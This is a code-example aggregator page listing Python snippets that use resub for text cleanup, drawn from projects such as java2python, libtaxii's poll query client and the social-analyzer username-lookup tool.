                    ['head', 'title', 'style', 'script', '[document]'])
            ]
            temp_profile["text"] = soup.getText()
            temp_profile["text"] = resub("\s\s+", " ", temp_profile["text"])
            temp_profile["text"] = temp_profile["text"].replace(
                "\n", "").replace("\t", "").replace("\r", "").strip()
        with suppress(Exception):
            temp_profile["language"] = get_language_by_parsing(source)
            if temp_profile["language"] == "unavailable":
                temp_profile["language"] = get_language_by_guessing(
                    temp_profile["text"])
        with suppress(Exception):
            temp_profile["title"] = BeautifulSoup(source,
                                                  'html.parser').title.string
            temp_profile["title"] = resub("\s\s+", " ", temp_profile["title"])
            temp_profile["title"] = temp_profile["title"].replace(
                "\n", "").replace("\t", "").replace("\r", "").strip()
        if temp_profile["text"] == "":
            temp_profile["text"] = "unavailable"
        if temp_profile["title"] == "":
            temp_profile["title"] = "unavailable"
        with suppress(Exception):
            temp_profile["rate"] = "%" + str(
                round(((temp_profile["found"] / detections_count) * 100), 2))

        temp_profile["link"] = site["url"].replace("{username}",
                                                   req["body"]["string"])
        temp_profile["type"] = site["type"]

        if "FindUserProfilesFast" in options and "GetUserProfilesFast" not in options:
            temp_profile['method'] = "find"
        elif "GetUserProfilesFast" in options and "FindUserProfilesFast" not in options:
            temp_profile['method'] = "get"
        elif "FindUserProfilesFast" in options and "GetUserProfilesFast" in options:
            temp_profile['method'] = "all"

        copy_temp_profile = temp_profile.copy()
        return copy_temp_profile

Пример #36

0

Показать файл

Файл: visitor.py Проект: mahongquan/java2python

 def stripComment(self, text):
     """ Regex substitutions for comments; removes comment characters. """
     subText = lambda value, regex:resub(regex, '', value)
     for text in ifilter(unicode.strip, text.split('\n')):
         yield reduce(subText, self.commentSubs, text)

Пример #37

0

Показать файл

 def stripComment(self, text):
     """ Regex substitutions for comments; removes comment characters. """
     subText = lambda value, regex: resub(regex, '', value)
     for text in ifilter(unicode.strip, text.split('\n')):
         yield reduce(subText, self.commentSubs, text)

Пример #38

0

Показать файл

Файл: metric.py Проект: kaiHooman/Pybooster

def str2tupleunit(_str: str) -> tuple:
    """Convert measurement units from string to tuple"""
    _num = resub('([0-9.]+)([ _,]*)([A-Za-z/]+)', r'\1', _str)
    _unit = resub('([0-9.]+)([ _,]*)([A-Za-z/]+)', r'\3', _str)
    return (_num, _unit)

Пример #39

0

Показать файл

Файл: utils.py Проект: andrewsmedina/dead-parrot

def one_line_xml(string):
    string = "".join(string.splitlines())
    string = resub("[>]\s+[<]", "><", string)
    string = string.strip()
    return string

Пример #40

0

Показать файл

Файл: query_client.py Проект: guidovranken/libtaxii

def main():
    parser = scripts.get_base_parser("Poll Query Client", path="/services/poll/")
    parser.add_argument("--collection", dest="collection", default="default_queryable", help="Data Collection to poll. Defaults to 'default_queryable'.")
    parser.add_argument("--allow-asynch", dest="allow_asynch", default=True, help="Indicate whether or not the client support Asynchronous Polling. Defaults to True")
    parser.add_argument("--tev", dest="tev", default=t.CB_STIX_XML_111, help="Indicate which Targeting Expression Vocabulary is being used. Defaults to STIX XML 1.1.1")
    parser.add_argument("--target", dest="target", default="**/@id", help="The targeting expression to use. Defaults to **/@id (Any id, anywhere).")
    parser.add_argument("--rel", dest="relationship", default="equals", help="The relationship to use (e.g., equals). Defaults to equals.")
    parser.add_argument("--cm", dest="capability_module", default=None, help="The capability module being used. If not specified, the script will attempt to infer the correct capability module")
    # Parameters - optional depending on what relationship is chosen
    parser.add_argument("--value", dest=tdq.P_VALUE, default=None, help="The value to look for. Required (or not) and allowed values depend on the relationship.")
    parser.add_argument("--match-type", dest=tdq.P_MATCH_TYPE, default=None, choices=['case_sensitive_string', 'case_insensitive_string', 'number'], help="The match type. Required (or not) and allowed values depend on the relationship.")
    parser.add_argument("--case-sensitive", dest=tdq.P_CASE_SENSITIVE, default=None, choices=[True, False], help="Whether the match is case sensitive. Required (or not) and allowed values depend on the relationship.")

    args = parser.parse_args()

    capability_module = None
    relationship = None
    for cm_id, cm in tdq.capability_modules.iteritems():
        relationship = cm.relationships.get(args.relationship.lower(), None)

        if args.capability_module:  # The user specified a value - try to match on that
            if cm_id == args.capability_module:
                if not relationship:  # If the specified relationship is not in the capability module, that's an error
                    raise ValueError('Relationship (%s) not found in capability module (%s). Valid relationships are: %s' %
                                     (args.relationship, args.capability_module, cm.relationships.keys()))
                capability_module = cm
        elif relationship:  # User did not specify a value for capability_module, attempt to infer
            capability_module = cm

        if capability_module:
            break

    if not capability_module:
        raise ValueError("Unable to map relationship to Capability Module: %s" % args.relationship)

    # Make sure all required params are set and
    # no unused params are set

    tdq_params = {}

    for parameter in tdq.P_NAMES:
        param_obj = relationship.parameters.get(parameter, None)  # Will either be a parameter object or None
        param_value = getattr(args, parameter)  # Will either be a value or None

        if param_obj and not param_value:
            raise ValueError('The parameter "%s" is needed and was not specified. Specify using --%s <value>' % (parameter, parameter.replace('_', '-')))
        if param_value and not param_obj:
            raise ValueError('The parameter %s was specified and is not needed' % parameter)

        if param_obj:
            param_obj.verify(param_value)
            tdq_params[parameter] = param_value

    test = tdq.Test(capability_id=capability_module.capability_module_id,
                    relationship=relationship.name,
                    parameters=tdq_params)

    criterion = tdq.Criterion(target=args.target, test=test)

    criteria = tdq.Criteria(operator=tdq.OP_AND, criterion=[criterion])

    q = tdq.DefaultQuery(args.tev, criteria)

    poll_req = tm11.PollRequest(message_id=tm11.generate_message_id(),
                                collection_name=args.collection,
                                poll_parameters=tm11.PollRequest.PollParameters(allow_asynch=args.allow_asynch, query=q))

    print "Request:\n"
    if args.xml_output is False:
        print poll_req.to_text()
    else:
        print poll_req.to_xml(pretty_print=True)

    client = scripts.create_client(args)
    resp = client.call_taxii_service2(args.host, args.path, t.VID_TAXII_XML_11, poll_req.to_xml(pretty_print=True), args.port)
    r = t.get_message_from_http_response(resp, '0')

    print "Response:\n"
    if args.xml_output is False:
        print r.to_text()
    else:
        print r.to_xml(pretty_print=True)

    if r.message_type == tm11.MSG_POLL_RESPONSE:
        for cb in r.content_blocks:
            if cb.content_binding.binding_id == t.CB_STIX_XML_10:
                format = '_STIX10_'
                ext = '.xml'
            elif cb.content_binding.binding_id == t.CB_STIX_XML_101:
                format = '_STIX101_'
                ext = '.xml'
            elif cb.content_binding.binding_id == t.CB_STIX_XML_11:
                format = '_STIX11_'
                ext = '.xml'
            elif cb.content_binding.binding_id == t.CB_STIX_XML_111:
                format = '_STIX111_'
                ext = '.xml'
            else:  # Format and extension are unknown
                format = ''
                ext = ''

            if cb.timestamp_label:
                date_string = 't' + cb.timestamp_label.isoformat()
            else:
                date_string = 's' + datetime.datetime.now().isoformat()

            filename = (    response.collection_name.lstrip(".") +
                            format +
                            resub(r"[^a-zA-Z0-9]", "_", date_string) + ext
                            ).translate(None, '/\\:*?"<>|')
            filename = os.path.join(args.dest_dir, filename)

            f = open(filename, 'w')
            f.write(cb.content)
            f.flush()
            f.close()
            print "Wrote Content Block to %s" % filename

Пример #41

0

Показать файл

Файл: app.py Проект: zacel/social-analyzer

	def fetch_url(site, username, options):
		sleep(randint(1, 99) / 100)
		LOG.info("[Checking] "+ get_fld(site["url"]))
		source = ""

		detection_level = {
		  "extreme": {
			"fast": "normal",
			"slow": "normal,advanced,ocr",
			"detections": "true",
			"count":1,
			"found":2
		  },
		  "high": {
			"fast": "normal",
			"slow": "normal,advanced,ocr",
			"detections": "true,false",
			"count":2,
			"found":1
		  },
		  "current":"high"
		}

		headers = {
			"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0",
		}


		try:
			response = get(site["url"].replace("{username}", username), timeout=5, headers=headers, verify=False)
			source = response.text
			response.close()
			text_only = "unavailable";
			title = "unavailable";
			temp_profile = {}
			temp_detected = {}
			detections_count = 0

			def merge_dicts(temp_dict):
				result = {}
				for item in temp_dict:
					for key, value in item.items():
						if key in result:
							result[key] += value
						else:
							result[key] = value
				return result

			def detect_logic(detections):
				detections_count = 0
				temp_detected = []
				temp_found = "false"
				temp_profile = {
				  "found": 0,
				  "image": "",
				  "link": "",
				  "rate": "",
				  "status":"",
				  "title": "unavailable",
				  "language": "unavailable",
				  "text": "unavailable",
				  "type": "unavailable",
				  "good":"",
				  "method":""
				}
				for detection in detections:
					temp_found = "false"
					if detection["type"] in detection_level[detection_level["current"]]["fast"] and source != "":
						detections_count += 1
						if detection["string"].replace("{username}", username).lower() in source.lower():
							temp_found = "true"
						if detection["return"] == temp_found:
							temp_profile["found"] += 1
				return temp_profile, temp_detected, detections_count

			def detect():
				temp_profile_all = []
				temp_detected_all = []
				detections_count_all = 0
				for detection in site["detections"]:
					detections_ = []
					if detection["type"] == "shared":
						detections_ = next(item for item in SHARED_DETECTIONS if item["name"] == detection['name'])
						if len(detections_) > 0:
							val1, val2, val3 = detect_logic(detections_["detections"])
							temp_profile_all.append(val1)
							detections_count_all += val3

				val1, val2, val3 = detect_logic(site["detections"])
				temp_profile_all.append(val1)
				detections_count_all += val3
				return merge_dicts(temp_profile_all), temp_detected_all, detections_count_all

			temp_profile, temp_detected, detections_count = detect()

			if temp_profile["found"] >= detection_level[detection_level["current"]]["found"] and detections_count >= detection_level[detection_level["current"]]["count"]:
				temp_profile["good"] = "true"

			with suppress(Exception):
				soup = BeautifulSoup(source, "html.parser")
				[tag.extract() for tag in soup(["head", "title","style", "script", "[document]"])]
				temp_profile["text"] = soup.getText()
				temp_profile["text"] = resub("\s\s+", " ", temp_profile["text"])
			with suppress(Exception):
				temp_profile["language"] = get_language_by_parsing(source)
				if temp_profile["language"] == "unavailable":
					temp_profile["language"] = get_language_by_guessing(temp_profile["text"])
			with suppress(Exception):
				temp_profile["title"] = BeautifulSoup(source, "html.parser").title.string
				temp_profile["title"] = resub("\s\s+", " ", temp_profile["title"])

			temp_profile["text"] = temp_profile["text"].replace("\n", "").replace("\t", "").replace("\r", "").strip()
			temp_profile["title"] = temp_profile["title"].replace("\n", "").replace("\t", "").replace("\r", "").strip()

			if temp_profile["text"] == "":
				temp_profile["text"] = "unavailable"
			with suppress(Exception):
				if detections_count != 0:
					temp_value = round(((temp_profile["found"] / detections_count) * 100), 2)
					temp_profile["rate"] = "%" + str(temp_value)
					if temp_value >= 100.00:
						temp_profile["status"] = "good"
					elif temp_value >= 50.00 and temp_value < 100.00:
						temp_profile["status"] = "maybe"
					else:
						temp_profile["status"] = "bad"

			temp_profile["link"] = site["url"].replace("{username}", req["body"]["string"]);
			temp_profile["type"] = site["type"]

			if "FindUserProfilesFast" in options and "GetUserProfilesFast" not in options:
				temp_profile["method"] = "find"
			elif "GetUserProfilesFast" in options and "FindUserProfilesFast" not in options:
				temp_profile["method"] = "get"
			elif "FindUserProfilesFast" in options and "GetUserProfilesFast" in options:
				temp_profile["method"] = "all"

			copy_temp_profile = temp_profile.copy()
			return 1,site["url"], copy_temp_profile
		except Exception as e:
			pass

		return None,site["url"],[]

Пример #42

0

Показать файл

    def check_user_cli(self, argv):
        '''
        main cli logic
        '''

        temp_detected = {"detected": [], "unknown": [], "failed": []}
        temp_options = "GetUserProfilesFast,FindUserProfilesFast"
        if argv.method != "":
            if argv.method == "find":
                temp_options = "FindUserProfilesFast"
            if argv.method == "get":
                temp_options = "GetUserProfilesFast"

        req = {"body": {"uuid": str(uuid4()), "string": argv.username, "options": temp_options}}
        self.setup_logger(uuid=req["body"]["uuid"], file=True, argv=argv)
        self.init_logic()

        if argv.cli:
            if not self.silent:
                self.log.info("[Warning] --cli is not needed and will be removed later on")

        for site in self.websites_entries:
            site["selected"] = "false"

        if argv.websites == "all":
            list_of_countries = []
            if argv.countries != "all":
                list_of_countries = argv.countries.split(" ")
                for site in self.websites_entries:
                    if site["country"] != "" and site["country"].lower() in list_of_countries:
                        site["selected"] = "true"
                    else:
                        site["selected"] = "false"
            else:
                for site in self.websites_entries:
                    site["selected"] = "true"

            if argv.type != "all":
                sites = ([d for d in self.websites_entries if d.get('selected') == "true"])
                if "adult" in argv.type.lower():
                    for site in sites:
                        if "adult" in site["type"].lower():
                            self.search_and_change(site, {"selected": "pendding"})
                for site in self.websites_entries:
                    if site["selected"] == "pendding":
                        site["selected"] = "true"
                    else:
                        site["selected"] = "false"

            if int(argv.top) != 0:
                sites = ([d for d in self.websites_entries if d.get('selected') == "true"])
                sites = ([d for d in sites if d.get('global_rank') != 0])
                sites = sorted(sites, key=lambda x: x['global_rank'])
                for site in sites[:int(argv.top)]:
                    self.search_and_change(site, {"selected": "pendding"})
                for site in self.websites_entries:
                    if site["selected"] == "pendding":
                        site["selected"] = "true"
                    else:
                        site["selected"] = "false"
        else:
            for site in self.websites_entries:
                for temp in argv.websites.split(" "):
                    if temp in site["url"]:
                        site["selected"] = "true"

        true_websites = 0
        for site in self.websites_entries:
            if site["selected"] == "true":
                true_websites += 1

        if not self.silent:
            self.log.info("[Init] Selected websites: {}".format(true_websites))
        resutls = self.find_username_normal(req)

        for item in resutls:
            if item is not None:
                if item["method"] == "all":
                    if item["good"] == "true":
                        item = self.delete_keys(item, ["method", "good"])
                        item = self.clean_up_item(item, argv.options)
                        temp_detected["detected"].append(item)
                    else:
                        item = self.delete_keys(item, ["found", "rate", "status", "method", "good", "text", "extracted", "metadata"])
                        item = self.clean_up_item(item, argv.options)
                        temp_detected["unknown"].append(item)
                elif item["method"] == "find":
                    if item["good"] == "true":
                        item = self.delete_keys(item, ["method", "good"])
                        item = self.clean_up_item(item, argv.options)
                        temp_detected["detected"].append(item)
                elif item["method"] == "get":
                    item = self.delete_keys(item, ["found", "rate", "status", "method", "good", "text", "extracted", "metadata"])
                    item = self.clean_up_item(item, argv.options)
                    temp_detected["unknown"].append(item)
                else:
                    item = self.delete_keys(item, ["found", "rate", "status", "method", "good", "text", "title", "language", "rate", "extracted", "metadata"])
                    item = self.clean_up_item(item, argv.options)
                    temp_detected["failed"].append(item)

        with suppress(Exception):
            if len(temp_detected["detected"]) == 0:
                del temp_detected["detected"]
            else:
                if "all" in argv.profiles or "detected" in argv.profiles:
                    if argv.filter == "all":
                        pass
                    else:
                        temp_detected["detected"] = [item for item in temp_detected["detected"] if item['status'] in argv.filter]
                    if len(temp_detected["detected"]) > 0:
                        temp_detected["detected"] = sorted(temp_detected["detected"], key=lambda k: float(k['rate'].strip('%')), reverse=True)
                    else:
                        del temp_detected["detected"]
                else:
                    del temp_detected["detected"]

            if len(temp_detected["unknown"]) == 0:
                del temp_detected["unknown"]
            else:
                if "all" in argv.profiles or "unknown" in argv.profiles:
                    pass
                else:
                    del temp_detected["unknown"]

            if len(temp_detected["failed"]) == 0:
                del temp_detected["failed"]
            else:
                if "all" in argv.profiles or "failed" in argv.profiles:
                    pass
                else:
                    del temp_detected["failed"]

        if argv.output == "pretty" or argv.output == "":
            if 'detected' in temp_detected:
                if not self.silent:
                    self.log.info("[Detected] {} Profile[s]".format(len(temp_detected['detected'])))
            if 'unknown' in temp_detected:
                if not self.silent:
                    self.log.info("[unknown] {} Profile[s]".format(len(temp_detected['unknown'])))
            if 'failed' in temp_detected:
                if not self.silent:
                    self.log.info("[failed] {} Profile[s]".format(len(temp_detected['failed'])))

        if "detected" in temp_detected:
            if self.screenshots and self.screenshots_location:
                location = None
                with suppress(Exception):
                    if not self.silent:
                        self.log.info("[Info] Getting screenshots of {} profiles".format(len([item['link'] for item in temp_detected["detected"]])))
                with suppress(Exception):
                    g = Galeodes(browser="chrome", arguments=['--headless', self.headers['User-Agent']], options=None, implicit_wait=5, verbose=False)
                    results = g.get_pages(urls=[item['link'] for item in temp_detected["detected"]], screenshots=True, number_of_workers=10, format='jpeg', base64=False)
                    for item in results:
                        if item['image'] is not None:
                            with suppress(Exception):
                                file_name = resub(r'[^\w\d-]', '_', item['url']) + '.jpeg'
                                with open(path.join(self.screenshots_location, file_name), 'wb') as f:
                                    f.write(item['image'])
                                    location = self.screenshots_location
                if location:
                    if not self.silent:
                        self.log.info("[Info] Screenshots location {}".format(location))

        if argv.output == "pretty" or argv.output == "":
            if 'detected' in temp_detected:
                if not self.silent:
                    self.log.info({"custom": temp_detected['detected']})
            if 'unknown' in temp_detected:
                if not self.silent:
                    self.log.info({"custom": temp_detected['unknown']})
            if 'failed' in temp_detected:
                if not self.silent:
                    self.log.info({"custom": temp_detected['failed']})

        if argv.output == "json":
            if not self.silent:
                self.log.info(dumps(temp_detected, sort_keys=True, indent=None))

        return temp_detected

Пример #43

0

Показать файл

Файл: gen.py Проект: OlivierBlanvillain/blogforever-crawler-publication

def cleanTags(string):
  htmlCleaned = Cleaner(allow_tags=[''], remove_unknown_tags=False, style=True
      ).clean_html(string or u"dummy")
  return resub(r"\s\s+" , " ", htmlCleaned)

Python resub примеры использования